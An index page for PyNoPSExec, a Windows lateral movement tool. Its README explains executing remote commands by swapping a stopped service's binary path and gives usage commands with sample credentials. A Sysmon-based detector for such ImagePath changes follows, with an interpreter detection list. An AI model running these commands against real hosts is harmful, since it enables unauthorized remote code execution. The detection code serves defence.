Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/b0bac/PyNoPSExec
A Python-based lateral movement tool modified from SharpNoPSExec. A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena
Last synced: 21 days ago
- Host: GitHub
- URL: https://github.com/b0bac/PyNoPSExec
- Owner: b0bac
- Created: 2021-05-08T05:10:20.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-05-08T08:50:11.000Z (over 3 years ago)
- Last Synced: 2024-08-05T17:45:08.338Z (4 months ago)
- Language: Python
- Homepage:
- Size: 5.34 MB
- Stars: 32
- Watchers: 1
- Forks: 8
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - b0bac/PyNoPSExec - A Python-based lateral movement tool modified from SharpNoPSExec. A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena (Python)
README
# PyNoPSExec
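**A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena. A lateral movement tool rewritten from @juliourena's SharpNoPSExec project.**
+ Platform: Windows 10
+ Language: Python2
## How it works
**The tool executes a command by changing the binary path that a service starts from and then starting the service. The requirements for the service are:**
+ The service is not running, and its start type is manual or disabled
+ The service has no dependencies
+ The script does not restore the service's binary path. Record the original path first; you can then run the script again to restore it, so that the service does not break
+ To query a service, use services.py from the impacket examples, or the corresponding exe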
```bash
.\services.exe sec/testuser:TestPassword@[email protected] config -name AppMgmt
```
![image](https://user-images.githubusercontent.com/11972644/117533063-371b2c80-b01d-11eb-918b-b36c820e6d7c.png)

## Usage
```bash
net use \\192.168.23.107\admin$ "TestPassword@123" /user:testuser
python PyNoPSexec.py -t 192.168.23.107 -u testuser -p "TestPassword@123" -d test.sec.com -s AppMgmt -e "c:\\windows\\system32\\cmd.exe /c echo hackedbybobac > c:\\bobac.txt"
```
![image](https://user-images.githubusercontent.com/11972644/117527553-82264700-afff-11eb-9850-45ecbd997f98.png)
![image](https://user-images.githubusercontent.com/11972644/117527633-0bd61480-b000-11eb-955e-d8310d463090.png)
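
For defenders, the binary-path change the README describes appears as a write to the service's `ImagePath` registry value. The following is an added example, not part of PyNoPSExec or of this page: it flags such writes in Sysmon Event ID 13 (registry value set) records that differ from a recorded baseline. The baseline, the sample events and the interpreter list are constructed assumptions, and Sysmon is assumed to be configured to log value sets under the `Services` key.

```python
import re

# Registry value that holds a service's binary path (Sysmon Event ID 13 target).
IMAGEPATH_RE = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.I)
# Interpreters that rarely belong in a service ImagePath (assumed list; tune locally).
INTERPRETER_RE = re.compile(
    r"\b(cmd(\.exe)?\s+/c|powershell|rundll32|mshta|regsvr32)", re.I)

# Constructed baseline and Sysmon-style records, not captured from a real host.
BASELINE = {"appmgmt": r"%SystemRoot%\system32\svchost.exe -k netsvcs -p"}
KEY = r"HKLM\System\CurrentControlSet\Services\AppMgmt"
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2021-05-08 08:00:01.000",
     "TargetObject": KEY + r"\ImagePath",
     "Details": r"c:\windows\system32\cmd.exe /c echo hackedbybobac > c:\bobac.txt"},
    {"EventID": 13, "UtcTime": "2021-05-08 08:00:02.000",
     "TargetObject": KEY + r"\Start", "Details": "DWORD (0x00000003)"},
    {"EventID": 13, "UtcTime": "2021-05-08 08:05:00.000",
     "TargetObject": KEY + r"\ImagePath", "Details": BASELINE["appmgmt"]},
]


def find_binpath_swaps(events, baseline):
    """Return one finding per ImagePath write that differs from the baseline."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = IMAGEPATH_RE.search(ev.get("TargetObject", ""))
        if not m:
            continue  # some other value under the service key, e.g. Start
        svc, new_path = m.group("svc"), ev.get("Details", "")
        known = baseline.get(svc.lower())  # None when the service is not baselined
        if known is not None and new_path.lower() == known.lower():
            continue  # path written back to the recorded value
        findings.append({
            "service": svc, "time": ev.get("UtcTime"),
            "new_path": new_path, "baseline": known,
            "interpreter": bool(INTERPRETER_RE.search(new_path)),
        })
    return findings


if __name__ == "__main__":
    for finding in find_binpath_swaps(SAMPLE_EVENTS, BASELINE):
        print(finding)
```

A finding followed shortly by a start of the same service, especially one whose start type was manual or disabled, is the sequence worth alerting on.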